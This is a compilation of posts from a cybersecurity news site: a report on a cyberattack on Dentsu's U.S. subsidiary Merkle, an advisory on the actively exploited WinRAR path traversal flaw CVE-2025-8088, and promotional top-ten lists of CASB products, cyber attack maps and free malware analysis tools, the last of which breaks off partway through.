The company detected abnormal activity within Merkle’s network infrastructure, which led to proactive security protocols being deployed to minimize operational impact.

Merkle, recognized as a leader in Customer Experience Management for Dentsu’s international operations, was targeted in the cyber incident that affected portions of its network systems.

Upon discovering the suspicious activity, Dentsu’s security teams immediately activated incident response procedures and made the strategic decision to shut down certain systems as a precautionary measure.

Investigation and Regulatory Compliance

The incident underscores the growing threat landscape facing major marketing and customer data management firms that handle sensitive client information across multiple industries.

Merkle serves numerous Fortune 500 companies and manages vast amounts of customer data, making it an attractive target for cybercriminals seeking valuable corporate and consumer information.

Dentsu has engaged an external cybersecurity firm with extensive experience handling similar breach investigations to assist with forensic analysis and remediation efforts.

The company emphasized its commitment to transparency by reporting the incident to relevant authorities in compliance with data protection regulations across different jurisdictions where it operates.

The ongoing investigation aims to determine the full extent of the breach, including what data may have been accessed or compromised, the attack vector used by threat actors, and whether any client information was exposed.

As organizations increasingly face sophisticated cyber threats, rapid detection and response have become critical components of enterprise security strategies. Dentsu has clarified that the cyberattack was isolated to Merkle’s U.S. operations and did not impact the company’s network systems in Japan.

This geographic containment suggests that Dentsu maintains segmented network infrastructure across its global operations, which helped prevent the incident from spreading to other regional divisions. However, the company acknowledged that financial repercussions are anticipated as a result of the breach.

Dentsu stated it is continuing to assess both the magnitude and timeline of the expected financial impact, which could include incident response costs, potential regulatory fines, customer notification expenses, and possible remediation investments to strengthen security controls.

The disclosure comes amid heightened scrutiny of cybersecurity practices across the marketing technology sector, where companies process massive volumes of consumer data for targeted advertising and personalized customer experiences.

As investigations continue, Dentsu remains focused on restoring full operational capabilities while implementing enhanced security measures to prevent future incidents.

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

The post Dentsu has Disclosed that its U.S.-based Subsidiary Merkle Suffers Cyberattack appeared first on Cyber Security News.

WinRAR has released version 7.13 to address a critical security vulnerability that has been actively exploited by cybercriminals, marking another significant security incident for the popular file compression software.

The vulnerability, designated CVE-2025-8088, allows attackers to execute arbitrary code through maliciously crafted archive files, prompting immediate action from users worldwide.

Critical Security Flaw Exploited by Russian Hackers

The newly discovered vulnerability represents a serious threat to Windows users, with security researchers confirming that it has been exploited in active campaigns.

CVE-2025-8088 is a path traversal vulnerability that affects the Windows versions of WinRAR, UnRAR, and associated components, allowing specially crafted archives to bypass user-specified extraction paths and write files to unintended locations on the file system.

This capability enables attackers to execute arbitrary code on compromised systems, making it a particularly dangerous security flaw.

ESET researchers have linked this vulnerability to exploitation by the Russian RomCom group, which has been targeting companies across Europe and Canada.

The cybersecurity firm’s research team, including Anton Cherepanov, Peter Košinár, and Peter Strýček, discovered the vulnerability and reported it to WinRAR developers.

The vulnerability has been assigned a CVSS score of 8.4, classifying it as HIGH severity, which underscores the critical nature of this security issue.

Technical Details and Affected Systems

The directory traversal vulnerability is distinct from a previously patched security flaw that was addressed in WinRAR version 7.12, indicating that this represents a new attack vector that required separate remediation. The affected systems include:

• WinRAR for Windows – All desktop installations of the primary software.
• RAR and UnRAR command-line utilities – Windows versions of these tools.
• UnRAR.dll and portable UnRAR – Dynamic library and standalone versions.
• Version range affected – All WinRAR versions from 0 through 7.12.
• Unaffected platforms – Linux/Unix builds and RAR for Android remain secure.

The vulnerability affects all WinRAR versions from 0 through 7.12, meaning that virtually all existing installations require immediate updating.

The path traversal mechanism allows malicious archives to escape their intended extraction directories, potentially overwriting system files or placing executable code in locations where it can be automatically executed by the operating system.

This type of attack can lead to complete system compromise, data theft, or deployment of additional malware payloads.

Immediate Action Required for Users

WinRAR users must immediately update to version 7.13, which was released on July 30, 2025, with updated release notes published on August 12, 2025.

The update addresses not only the critical security vulnerability but also fixes several bugs from the previous version, including issues with the “Import settings from file” command and recovery size settings for older compression profiles.

The urgency of this update cannot be overstated, particularly given the confirmed exploitation in the wild. Organizations and individual users should prioritize this update across all Windows systems running WinRAR.

Beyond the immediate security fix, WinRAR 7.13 continues to offer advanced NTFS features that distinguish it from other compression tools, including built-in options to preserve symbolic links and archive Alternate Data Streams (ADS).

These capabilities remain valuable for backup, deployment, and forensic environments, but users must ensure they are running the latest secure version to benefit from these features safely.

Users who cannot immediately update should consider discontinuing use of WinRAR until the update can be applied, particularly in environments where untrusted archive files are regularly processed.

Uncover full scope of any attack any attack from hidden redirects to payloads in minutes — Try ANY.RUN free for 14 days.

The post CISA Added WinRaR Zero-Day (CVE-2025-8088) Vulnerability That is Actively Exploited In the Wild appeared first on Cyber Security News.

Cloud Access Security Broker (CASB) software stands at the forefront, acting as the critical gatekeeper between users and cloud service providers.

With the explosion of SaaS, IaaS, and PaaS platforms, businesses face evolving threats, compliance challenges, and the risk of data leakage.

CASB solutions empower IT teams to enforce security policies, monitor cloud usage, and ensure regulatory compliance all while enabling agility and productivity.

Choosing the right CASB tool is essential for protecting sensitive data, managing shadow IT, and maintaining visibility across multi-cloud environments.

This comprehensive guide reviews the 11 best CASB software solutions for 2025, comparing their specifications, features, and value for organizations of all sizes.

Whether you’re a security leader at a global enterprise or an IT manager at a growing business, this article will help you make an informed decision and strengthen your cloud security posture.

CASB Comparison Table

1. Netskope

Netskope is widely recognized as a leader in cloud security, offering a comprehensive CASB solution that delivers deep visibility, advanced threat protection, and granular policy enforcement.

Its cloud-native architecture is designed for modern enterprises, supporting hybrid and multi-cloud environments.

Netskope enables organizations to discover and control both sanctioned and unsanctioned cloud apps, mitigate data loss risks, and ensure regulatory compliance with ease.

With its intuitive dashboard and robust analytics, security teams gain actionable insights into user activity and cloud usage patterns.

Netskope’s advanced DLP, threat intelligence, and contextual access controls make it a top choice for organizations prioritizing secure digital transformation.

Its seamless integration with existing security stacks and support for BYOD policies further enhance its value for distributed workforces.

Specifications

• Deployment: Cloud-native, API and proxy-based
• Supported Environments: SaaS, IaaS, PaaS
• Integration: SIEM, EDR, IAM, SWG
• Reporting: Real-time analytics, customizable dashboards

Reason to Buy

• Industry-leading visibility into cloud usage and threats
• Advanced DLP and threat protection capabilities
• Flexible deployment for hybrid and multi-cloud environments
• Strong compliance and policy enforcement tools

Features

• Shadow IT discovery and risk assessment
• Contextual access controls and encryption
• Real-time threat detection powered by AI
• Automated compliance reporting

Best For: Enterprises needing deep cloud visibility and advanced threat protection

🔗 Try Netskope here → Netskope Official Website

2. McAfee Skyhigh Security CASB

McAfee Skyhigh Security (formerly MVISION Cloud) delivers a robust CASB platform tailored for organizations with complex cloud environments.

The solution offers comprehensive protection for data across SaaS, IaaS, and PaaS platforms, leveraging global threat intelligence and advanced analytics.

Skyhigh Security excels in policy customization, enabling granular control over data access, sharing, and storage.

Its seamless integration with other security tools and regulatory frameworks makes it ideal for heavily regulated industries.

The platform’s intuitive interface and strong support for compliance standards such as GDPR, HIPAA, and PCI DSS ensure organizations can confidently manage cloud risk.

Specifications

• Deployment: Cloud-based, API-first architecture
• Supported Environments: SaaS, IaaS, PaaS
• Compliance: Pre-built policy templates for major regulations
• Analytics: Global threat intelligence, activity monitoring

Reason to Buy

• Comprehensive data protection across all major cloud services
• Strong policy customization and enforcement
• Integrated compliance management
• Global threat intelligence for proactive defense

Features

• Real-time activity monitoring and anomaly detection
• Automated policy enforcement and incident response
• Data classification and encryption
• Extensive third-party integrations

Best For: Organizations in regulated industries seeking comprehensive cloud security

🔗 Try McAfee Skyhigh Security here → McAfee Skyhigh Security Official Website

3. Zscaler CASB

Zscaler CASB is designed for simplicity, scalability, and robust security. As part of the Zscaler Zero Trust Exchange, it provides multimode protection for cloud data in motion and at rest.

Zscaler’s inline and API-based architecture enables real-time inspection, DLP, and threat prevention without compromising user experience.

The platform’s advanced analytics, automated policy management, and seamless integration with Zscaler’s broader security suite make it a strong choice for organizations moving towards zero trust architectures.

Zscaler CASB’s ability to discover shadow IT and enforce granular policies helps businesses reduce risk and maintain compliance.

Specifications

• Deployment: Inline proxy and API-based
• Supported Environments: SaaS, IaaS
• Policy Management: Automated, centralized
• Analytics: Real-time, customizable reports

Reason to Buy

• Real-time, inline protection for cloud data
• Seamless integration with zero trust architectures
• Automated discovery and control of shadow IT
• Scalable for large, distributed organizations

Features

• SSL inspection and advanced DLP
• Threat protection with cloud sandboxing
• API-based scanning of SaaS apps
• Collaboration management and risk assessment

Best For: Organizations adopting zero trust and needing scalable cloud security

🔗 Try Zscaler CASB here → Zscaler Official Website

4. Microsoft Defender For Cloud Apps

Microsoft Defender for Cloud Apps offers deep integration with Microsoft 365 and Azure, making it a natural fit for organizations heavily invested in the Microsoft ecosystem.

The CASB solution provides rich visibility, control, and analytics for cloud app usage, enabling IT teams to detect threats, enforce policies, and protect sensitive data.

Its user-friendly interface and strong automation capabilities simplify compliance and threat response.

Defender for Cloud Apps supports a wide range of third-party cloud services, ensuring comprehensive coverage for hybrid and multi-cloud environments.

Specifications

• Deployment: Cloud-native, API-based
• Supported Environments: Microsoft 365, Azure, third-party SaaS
• Integration: SIEM, Microsoft security stack
• Automation: Policy enforcement, incident response

Reason to Buy

• Seamless integration with Microsoft cloud services
• Automated threat detection and response
• Comprehensive compliance and reporting tools
• Extensive third-party app coverage

Features

• Real-time monitoring and risk assessment
• Automated policy enforcement
• DLP and information protection
• User and entity behavior analytics

Best For: Microsoft-centric organizations seeking integrated cloud security

🔗 Try Microsoft Defender for Cloud Apps here → Microsoft Defender for Cloud Apps Official Website

5. Cisco Cloudlock

Cisco Cloudlock offers a cloud-native CASB platform focused on simplicity, scalability, and rapid deployment.

It enables organizations to monitor cloud app usage, enforce security policies, and protect sensitive data across SaaS, PaaS, and IaaS environments.

Cloudlock’s API-based architecture ensures minimal impact on user experience while delivering powerful threat detection and compliance management.

The platform’s intuitive interface and flexible policy engine make it easy for IT teams to manage cloud risks and respond to incidents quickly.

Cisco Cloudlock is particularly well-suited for organizations seeking a straightforward, effective CASB solution.

Specifications

• Deployment: API-based, cloud-native
• Supported Environments: SaaS, IaaS, PaaS
• Integration: Cisco security suite, third-party tools
• Reporting: Real-time dashboards, audit logs

Reason to Buy

• Rapid deployment with minimal disruption
• Strong compliance and data protection features
• Flexible, easy-to-use policy management
• Scalable for growing organizations

Features

• Shadow IT discovery and control
• Automated threat detection and response
• DLP and encryption capabilities
• Integration with Cisco security products

Best For: Organizations seeking fast, scalable, and simple cloud security

🔗 Try Cisco Cloudlock here → Cisco Cloudlock Official Website

6. Symantec CloudSOC (Broadcom)

Symantec CloudSOC by Broadcom is a powerful CASB solution designed for enterprises with advanced compliance and security requirements.

It combines deep visibility, robust DLP, and real-time threat protection to safeguard cloud data and applications.

CloudSOC’s integration with Symantec’s DLP and threat intelligence platforms enhances its ability to detect and respond to sophisticated attacks.

The platform supports extensive compliance frameworks and offers detailed reporting, making it ideal for organizations in highly regulated sectors.

Its flexible deployment options and strong analytics capabilities provide comprehensive control over cloud environments.

Specifications

• Deployment: Cloud-based, hybrid options
• Supported Environments: SaaS, IaaS, PaaS
• Compliance: Extensive frameworks supported
• Analytics: Advanced threat and user behavior analytics

Reason to Buy

• Deep integration with Symantec’s security suite
• Advanced DLP and threat intelligence
• Extensive compliance support
• Flexible deployment for diverse environments

Features

• Real-time threat detection and response
• Automated compliance reporting
• Shadow IT discovery and risk assessment
• Data encryption and access controls

Best For: Enterprises with complex compliance and security needs

🔗 Try Symantec CloudSOC here → Symantec CloudSOC Official Website

7. Forcepoint CASB

Forcepoint CASB delivers robust cloud security with a focus on behavior analytics and real-time threat detection.

Its integration with Forcepoint’s DLP and risk analysis engines enables organizations to protect sensitive data and monitor user activity across cloud applications.

Forcepoint’s UEBA (User and Entity Behavior Analytics) helps identify anomalous behavior and prevent insider threats.

The platform’s flexible deployment and strong reporting capabilities make it suitable for organizations seeking proactive cloud risk management.

Forcepoint CASB is particularly effective for businesses prioritizing data-centric security and user behavior monitoring.

Specifications

• Deployment: Cloud-based, API and proxy options
• Supported Environments: SaaS, IaaS
• Analytics: UEBA, real-time monitoring
• Integration: Forcepoint DLP, third-party tools

Reason to Buy

• Advanced behavior analytics for insider threat detection
• Strong DLP and risk analysis capabilities
• Flexible deployment options
• Comprehensive reporting and compliance tools

Features

• Real-time activity monitoring and alerts
• Automated policy enforcement
• Data encryption and access management
• Integration with Forcepoint security suite

Best For: Organizations focusing on behavior analytics and insider threat prevention

🔗 Try Forcepoint CASB here → Forcepoint Official Website

8. Lookout CASB

Lookout CASB offers a flexible and comprehensive solution for securing data across cloud and on-premises environments.

Its platform provides complete control over access management, advanced data security, and proactive vulnerability detection.

Lookout’s intuitive interface and efficient access controls enable organizations to protect data regardless of endpoint or location.

The solution’s advanced search capabilities and self-remediation options empower users to address security issues quickly, reducing the burden on IT teams.

Lookout CASB is ideal for businesses seeking a user-friendly, highly configurable cloud security platform.

Specifications

• Deployment: Cloud-native, API-based
• Supported Environments: SaaS, IaaS, on-premises
• Access Control: Granular, context-aware
• Analytics: Advanced search, vulnerability detection

Reason to Buy

• Flexible access management for diverse environments
• Proactive vulnerability detection and alerts
• User-friendly interface and self-remediation
• Comprehensive data protection features

Features

• Real-time monitoring and access control
• Advanced data searching and classification
• Automated policy enforcement
• Integration with security and compliance tools

Best For: Organizations needing flexible, user-friendly cloud security

🔗 Try Lookout CASB here → Lookout Official Website

9. Palo Alto Networks Prisma Access

Palo Alto Networks Prisma Access delivers a unified security platform that includes advanced CASB capabilities.

Its cloud-delivered architecture provides consistent protection across all users, applications, and devices, regardless of location.

Prisma Access integrates seamlessly with Palo Alto’s broader security ecosystem, offering robust threat prevention, DLP, and compliance management.

The platform’s AI-powered analytics and automated policy enforcement make it easy to manage cloud risks and maintain compliance.

Prisma Access is well-suited for organizations seeking a comprehensive, scalable solution for securing cloud and remote workforces.

Specifications

• Deployment: Cloud-delivered, unified platform
• Supported Environments: SaaS, IaaS, PaaS
• Analytics: AI-powered, real-time
• Integration: Palo Alto security suite, third-party tools

Reason to Buy

• Unified security for cloud and remote users
• AI-driven threat detection and policy automation
• Seamless integration with existing security tools
• Scalable for large, distributed organizations

Features

• Real-time monitoring and DLP
• Automated threat prevention and response
• Compliance management and reporting
• Centralized policy enforcement

Best For: Large organizations needing unified cloud and remote security

🔗 Try Prisma Access here → Palo Alto Networks Prisma Access Official Website

10. Proofpoint CASB

Proofpoint CASB is designed to protect cloud applications from advanced threats and data loss.

Its solution offers granular visibility into cloud usage, automated policy enforcement, and robust threat intelligence.

Proofpoint’s integration with email security and DLP platforms enhances its ability to detect and respond to sophisticated attacks.

The platform’s user-centric approach and advanced analytics make it easy for organizations to identify risky behaviors and enforce security policies.

Proofpoint CASB is ideal for businesses seeking comprehensive protection against cloud-borne threats.

Specifications

• Deployment: Cloud-based, API-first
• Supported Environments: SaaS, IaaS
• Analytics: User-centric, advanced threat intelligence
• Integration: Proofpoint security suite, third-party tools

Reason to Buy

• Granular visibility and control over cloud usage
• Automated policy enforcement and threat response
• Integration with email and DLP security
• Advanced analytics for risk identification

Features

• Real-time monitoring and alerts
• DLP and encryption capabilities
• Automated compliance reporting
• Integration with security and compliance tools

Best For: Organizations prioritizing advanced threat and data loss protection

🔗 Try Proofpoint CASB here → Proofpoint Official Website

11. Censornet CASB

Censornet CASB is part of the Censornet Autonomous Security Engine, offering integrated cloud security with adaptive multi-factor authentication, email security, and web security.

Its CASB component provides extensive reporting, secure user authentication, and real-time monitoring of cloud app usage.

Censornet’s pre-built trend reports and flexible policy engine enable organizations to manage cloud risks effectively.

The platform’s user-friendly interface and adaptive security features make it suitable for businesses seeking integrated, automated cloud protection.

Specifications

• Deployment: Cloud-based, integrated with Censornet ASE
• Supported Environments: SaaS, IaaS
• Reporting: Pre-built trend reports, customizable views
• Authentication: Adaptive MFA, IDaaS

Reason to Buy

• Integrated security across cloud, email, and web
• Extensive reporting and analytics
• Adaptive authentication and access control
• Automated policy enforcement

Features

• Real-time monitoring and alerts
• Automated compliance reporting
• User and device risk assessment
• Integration with Censornet security suite

Best For: Businesses seeking integrated, automated cloud security

🔗 Try Censornet CASB here → Censornet Official Website

Conclusion

Selecting the right Cloud Access Security Broker software is crucial for safeguarding your organization’s data, ensuring compliance, and enabling secure cloud adoption.

Each CASB solution reviewed here offers unique strengths, from advanced threat detection and behavior analytics to seamless integration with existing security stacks.

Whether your priority is regulatory compliance, insider threat prevention, or unified cloud security, there’s a CASB tool tailored to your needs.

As cloud environments become more complex, investing in a leading CASB solution will help your business stay resilient against evolving threats, maintain visibility and control, and support secure digital transformation.

Use this guide as your roadmap to evaluate, compare, and deploy the best CASB software for your organization in 2025.

The post 11 Best Cloud Access Security Broker Software (CASB) – 2025 appeared first on Cyber Security News.

Real-time visibility into these threats is essential for proactive defense, strategic planning, and rapid incident response.

Cyber attack maps have become indispensable tools for cybersecurity professionals and organizations.

These interactive platforms provide live visualizations of global cyber threats, helping users monitor attack patterns, assess risks, and stay ahead of emerging dangers.

Whether you’re a security analyst, IT manager, or simply interested in cyber trends, understanding the best cyber attack maps can empower your digital defense strategy.

This comprehensive guide reviews the Top 10 Cyber Attack Maps to See Digital Threats in 2025, comparing their features, specifications, and unique advantages.

We’ll help you discover which map best fits your needs, with clear reasons to buy, detailed features, and direct links to try each tool.

Comparison Table: Top 10 Cyber Attack Maps 2025

1. Kaspersky Cyberthreat Map

Kaspersky’s Cyberthreat Map is a visually stunning platform that displays real-time cyber threats from around the world.

The map aggregates data from multiple sources, including on-access and on-demand scans, mail and web anti-virus, intrusion detection, and botnet activity.

Users can rotate and zoom on specific countries to view nation-specific data and historical trends.

Kaspersky’s interface is sleek, interactive, and informative, making it a favorite among security professionals and enthusiasts alike.

The map not only reveals ongoing attacks but also provides insights into the most infected countries and prevalent threat types.

Its rich data sources and intuitive controls make it an excellent choice for monitoring the global threat landscape or drilling down into local risks.

Specifications

• Real-time visualization of global cyber threats
• Multiple data sources (scans, botnet, anti-virus, etc.)
• Country-specific details and statistics
• Interactive globe view with zoom and rotation
• Historical data and trends

Reason to Buy

• Comprehensive real-time threat monitoring
• User-friendly and visually engaging interface
• Detailed breakdown by country and threat type
• Trusted by cybersecurity professionals worldwide

Features

• Multiple display modes and nation panels
• Top threat types and infected regions
• Customizable views for deeper insights
• Option to embed the map on your website

Best For: Real-time global threat awareness and detailed regional analysis

🔗 Try Kaspersky Cyberthreat Map here → Kaspersky Official Website

2. Fortinet Threat Map

Fortinet’s Threat Map delivers a real-time view of malicious network activity across the globe.

Leveraging data from Fortinet’s extensive network of security appliances, the map displays attack types, severity, and geographic locations.

Users can click on any country to see detailed statistics for incoming and outgoing attacks, providing a granular perspective on the threat environment.

The platform’s clean interface and ongoing statistics, such as botnet C&C attempts and malware programs per minute, make it a valuable resource for organizations seeking actionable intelligence on current threats.

Specifications

• Live visualization of attack types and locations
• Real-time statistics and activity logs
• Country-level breakdowns
• Integration with Fortinet’s security ecosystem

Reason to Buy

• High-fidelity, real-time threat intelligence
• Deep integration with Fortinet solutions
• Country-specific analytics for targeted defense
• Continuous updates from a global sensor network

Features

• Detailed logs of attack types and severity
• Customizable threat monitoring
• Day/night map overlay
• Ongoing botnet and malware statistics

Best For: Organizations using Fortinet products or seeking granular attack analytics

🔗 Try Fortinet Threat Map here → Fortinet Official Website

3. Check Point ThreatCloud Map

Check Point’s ThreatCloud Map offers a daily-updated, real-time visualization of global cyber attacks.

The platform presents a clear chart of recent attacks, top targeted countries, and industries, along with the most-used malware types.

Its historical playback feature allows users to review past attack data for deeper analysis.

The map’s straightforward visuals and regularly refreshed data make it ideal for both quick overviews and in-depth threat investigations.

Specifications

• Real-time and historical attack data
• Daily updates and playback feature
• Global and regional attack statistics
• Malware type breakdowns

Reason to Buy

• Trusted, up-to-date threat intelligence
• Historical data for trend analysis
• Simple, clean interface for rapid insights
• Focus on top targeted sectors and regions

Features

• Attack playback and daily charts
• Customizable filters for attack types
• Malware and target country statistics
• Easy-to-understand data visualizations

Best For: Security teams needing daily threat updates and historical analysis

🔗 Try Check Point ThreatCloud Map here → Check Point Official Website

4. Norse Attack Map

The Norse Attack Map is renowned for its mesmerizing real-time visualizations of cyber attacks.

This map detects your location and displays live stats for your country, including top local attacks and infection types.

The platform’s graphical interface is sleek and engaging, offering a dramatic view of ongoing cyber battles worldwide.

Although not the most feature-rich, Norse’s map is highly effective for raising awareness and illustrating the scale of global cyber threats.

Specifications

• Real-time attack visualization
• Geolocation of sources and targets
• Attack types and targeted services
• Sleek, interactive interface

Reason to Buy

• Eye-catching, live cyber attack displays
• Immediate awareness of global threats
• Simple, intuitive user experience
• Free and accessible to all users

Features

• Country-specific stats and trends
• Toggle map color and globe view
• Demo mode for presentations
• Helpful articles and buzz tap

Best For: Visualizing attack patterns and public cybersecurity awareness

🔗 Try Norse Attack Map here → Norse Official Website

5. FireEye Threat Map

FireEye’s Threat Map provides a real-time summary of cyber attacks detected by its global network. The platform highlights the total number of daily attacks, top targeted industries, and leading attacker countries.

While it offers less granular detail than some competitors, FireEye’s map excels in presenting a quick, easy-to-read overview of the current threat landscape.

This tool is particularly useful for identifying advanced persistent threats and monitoring global attack campaigns.

Specifications

• Real-time attack summaries
• Daily attack totals and trends
• Industry and country breakdowns
• Data sourced from FireEye’s global network

Reason to Buy

• Fast, accessible threat overview
• Focus on advanced persistent threats
• Industry-specific attack insights
• Backed by FireEye’s threat intelligence

Features

• Top attacker and target statistics
• Simple, user-friendly interface
• Daily updated data
• Overview of global attack campaigns

Best For: Quick threat overviews and industry-specific monitoring

🔗 Try FireEye Threat Map here → FireEye Official Website

6. Akamai Real-Time Web Attack Monitor

Akamai’s Real-Time Web Attack Monitor leverages its massive global network to visualize web-based attacks as they happen.

The map pinpoints sources and targets, displaying the most significant attack locations over the past 24 hours.

Users can choose different regions and languages, making it accessible to a global audience.

Akamai’s map is ideal for organizations concerned with web application security and large-scale DDoS attacks.

Specifications

• Real-time web attack visualization
• Global and regional filtering
• Multi-language support
• Data from Akamai’s CDN and security services

Reason to Buy

• Extensive global attack coverage
• Focus on web and DDoS threats
• Regional and language customization
• Backed by Akamai’s industry-leading infrastructure

Features

• Top attack locations and trends
• Adjustable dashboards and notifications
• Learning resources and glossary
• 24-hour attack history

Best For: Monitoring web-based attacks and DDoS trends

🔗 Try Akamai Real-Time Web Attack Monitor here → Akamai Official Website

7. Digital Attack Map

The Digital Attack Map, created in collaboration with Arbor Networks and Google, specializes in visualizing global DDoS attacks.

The platform offers real-time data on attack intensity and frequency, with options to view historical trends and filter by size or type.

The map’s intuitive interface and focus on DDoS make it a go-to tool for organizations needing to track large-scale disruptions.

Although the tool’s maintenance status should be checked for 2025, it remains a valuable resource for DDoS situational awareness.

Specifications

• Real-time DDoS attack visualization
• Attack traffic intensity and location
• Historical data and filtering options
• Collaboration with Arbor Networks and Google

Reason to Buy

• Focused insight into DDoS activity
• Historical trends for incident analysis
• Easy-to-use, interactive interface
• Recognized by industry leaders

Features

• Real-time and historical filtering
• Attack size and type customization
• Global and regional monitoring
• Intuitive data visualizations

Best For: DDoS threat monitoring and historical analysis

🔗 Try Digital Attack Map here → Digital Attack Map Official Website

8. Bitdefender Threat Map

Bitdefender’s Threat Map is an interactive platform that displays live attacks, infections, and spam worldwide.

The map provides real-time reports with details on attack type, time, and location, helping users identify emerging threats quickly.

Its clear visuals and up-to-date information make it a strong choice for anyone seeking a comprehensive view of global cyber risks.

Bitdefender’s focus on infections and spam adds an extra layer of intelligence for organizations facing diverse threat vectors.

Specifications

• Live attack, infection, and spam data
• Real-time reporting by type and location
• Interactive, user-friendly interface
• Global coverage

Reason to Buy

• Comprehensive threat intelligence
• Focus on infections and spam trends
• Real-time updates for rapid response
• Backed by Bitdefender’s research

Features

• Attack and infection breakdowns
• Global and regional views
• Spam and malware tracking
• Simple, interactive controls

Best For: Organizations monitoring infections, spam, and malware

🔗 Try Bitdefender Threat Map here → Bitdefender Official Website

9. SonicWall Live Cyber Attack Map

SonicWall’s Live Cyber Attack Map offers a graphical view of attacks over the past 24 hours, including malware, ransomware, encrypted traffic, intrusion attempts, and spam/phishing.

The map highlights both the origin and target of each attack, providing actionable intelligence for security teams.

SonicWall’s platform is particularly valuable for organizations seeking to monitor a wide range of threat types in real time.

Specifications

• 24-hour attack visualization
• Multiple attack categories
• Source and target mapping
• Security news and research integration

Reason to Buy

• Broad threat coverage (malware, ransomware, etc.)
• Real-time and historical insights
• Integration with SonicWall research
• Easy-to-use graphical interface

Features

• Attack site statistics
• Security news updates
• Multiple threat categories
• Interactive global map

Best For: Comprehensive, multi-threat monitoring

🔗 Try SonicWall Live Cyber Attack Map here → SonicWall Official Website

10. Imperva Live Threat Map

Imperva’s Live Threat Map provides a real-time global view of DDoS attacks, hacking attempts, and bot assaults.

The map is powered by Imperva’s security services, offering instant visibility into ongoing threats and their geographic spread.

Its clean interface and focus on actionable intelligence make it a practical tool for both security professionals and the general public.

Imperva’s map is especially useful for organizations concerned with DDoS and botnet activity.

Specifications

• Real-time global attack visualization
• DDoS, hacking, and botnet coverage
• Data sourced from Imperva’s security services
• Simple, intuitive interface

Reason to Buy

• Real-time, actionable threat intelligence
• Focus on DDoS and bot attacks
• Trusted by enterprises worldwide
• Free and open access

Features

• Global attack mapping
• Multiple threat categories
• Instant updates
• Easy-to-understand visuals

Best For: DDoS and botnet threat monitoring

🔗 Try Imperva Live Threat Map here → Imperva Official Website

Conclusion

Cyber attack maps are now essential tools in the fight against digital threats.

In 2025, with cyber risks evolving at breakneck speed, these platforms empower organizations and individuals to visualize, understand, and respond to global and local threats in real time.

Whether you need granular analytics, historical playback, or simply a live snapshot of the world’s digital battles, there’s a cyber attack map tailored to your needs.

By leveraging the top 10 cyber attack maps reviewed here, you gain a strategic edge in threat detection, risk assessment, and incident response.

Stay informed, stay vigilant, and let these powerful visualization tools guide your cybersecurity journey in the ever-changing digital landscape.

The post Top 10 Cyber Attack Maps to See Digital Threats In 2025 appeared first on Cyber Security News.

With the growing sophistication of cyber threats, having access to reliable, free malware analysis tools is essential for dissecting, understanding, and mitigating malicious software.

This article reviews the 10 best free malware analysis tools in 2025 covering their specifications, features, reasons to use, and who they’re best for.

Whether you’re a beginner or a seasoned analyst, these tools will help you break down malware samples and enhance your cyber defense strategies.

SEO Keywords

Primary SEO Keywords: malware analysis tools, free malware analysis, best malware analysis tools, malware analysis 2025
Secondary SEO Keywords: cyber threats, cybersecurity tools, malware detection, malware sandbox, malware removal tools, malware analysis online, network security, threat intelligence

Comparison Table: 10 Best Free Malware Analysis Tools (2025)

1. Cuckoo Sandbox

Cuckoo Sandbox is an open-source automated malware analysis system that allows users to safely execute and analyze suspicious files, URLs, and documents in a controlled, isolated environment.

It supports a wide range of file types including executables, documents, scripts, and archives and provides detailed behavioral reports by monitoring system changes, API calls, network activity, and more.

Specifications:

• OS: Windows, Linux
• Analysis: Static & Dynamic
• API: Yes
• Deployment: On-premise

Features:

• Modular and extensible architecture
• Analyzes executables, documents, scripts, and more
• Tracks API calls, network traffic (including SSL/TLS), and file system changes
• Integrates with Volatility for memory analysis
• Generates comprehensive, high-level reports

Reason to Buy:

• Completely free and open-source
• Highly customizable for advanced workflows
• No reliance on third-party cloud full data control

Best For: Automated sandboxing and custom malware analysis workflows

🔗 Try Cuckoo Sandbox here → Cuckoo Sandbox Official Website

2. REMnux

REMnux is a Linux distribution specifically designed for malware analysis and reverse engineering.

It provides a curated collection of free, community-developed tools that allow analysts to perform static and dynamic analysis, memory forensics, and network investigation without the hassle of manual installation and configuration.

Specifications:

• OS: Linux (x86/amd64, OVA, Docker)
• Analysis: Static & Dynamic
• API: No
• Deployment: Local, Cloud

Features:

• Pre-configured with tools for unpacking, deobfuscation, and network forensics
• Beginner-friendly with extensive documentation
• Easily updatable via SaltStack
• Can be deployed in the cloud or on-premise

Reason to Buy:

• Saves time with pre-installed, curated tools
• Free and open-source
• Suitable for both beginners and experts

Best For: Reverse engineering and comprehensive malware analysis

🔗 Try REMnux here → REMnux Official Website

3. VirusTotal

VirusTotal is a free online service that analyzes files, URLs, IP addresses, and domains for malicious content by aggregating results from dozens of antivirus engines and threat intelligence feeds.

It enables users to quickly check whether a file or link is potentially dangerous, making it a widely used tool for malware analysis, incident response, and threat intelligence across the cybersecurity community.

Specifications:

• OS: Web-based
• Analysis: Static (some dynamic)
• API: Yes
• Deployment: Cloud

Features:

• Scans files, URLs, IPs, and domains
• Aggregates results from multiple AV engines
• Provides hash, network, and behavior analysis
• Offers public and private submissions
• Machine learning-based detection

Reason to Buy:

• No installation required
• Extremely fast and user-friendly
• API for automation and integration

Best For: Quick online malware detection and threat intelligence

🔗 Try VirusTotal here → VirusTotal Official Website

4. Hybrid Analysis

Hybrid Analysis is a free malware analysis platform that combines static and dynamic analysis techniques to provide comprehensive insights into suspicious files and URLs.

It uses sandboxing technology and machine learning to observe file behavior, network activity, and system changes in a controlled environment, generating detailed reports with indicators of compromise and threat intelligence data.

Specifications:

• OS: Web-based
• Analysis: Static & Dynamic
• API: Yes
• Deployment: Cloud

Features:

• AI-powered behavioral scoring
• Detailed forensic reports
• Supports a wide range of file types
• Integration with CrowdStrike Falcon
• Minimal setup required

Reason to Buy:

• Fast, cloud-based analysis
• Public and private modes for confidentiality
• Easy integration with security platforms

Best For: Cloud-based sandbox analysis and enterprise integration

🔗 Try Hybrid Analysis here → Hybrid Analysis Official Website

5. ANY.RUN

ANY.RUN is an interactive online malware analysis sandbox that allows users to analyze suspicious files and URLs in real time within a safe, virtual machine environment.

It provides dynamic analysis capabilities, enabling security professionals to interact with malware samples, observe their behavior, extract Indicators of Compromise (IOCs), and generate detailed reports.

Specifications:

• OS: Web-based
• Analysis: Static & Dynamic
• API: Yes
• Deployment: Cloud

Features:

• Real-time, interactive analysis
• Monitors processes, network traffic, and system changes
• Collaboration tools for team analysis
• Supports Windows malware

Reason to Buy:

• Live interaction with malware for deeper insights
• Easy to use, no installation needed
• Facilitates collaborative investigations

Best For: Interactive, real-time malware analysis
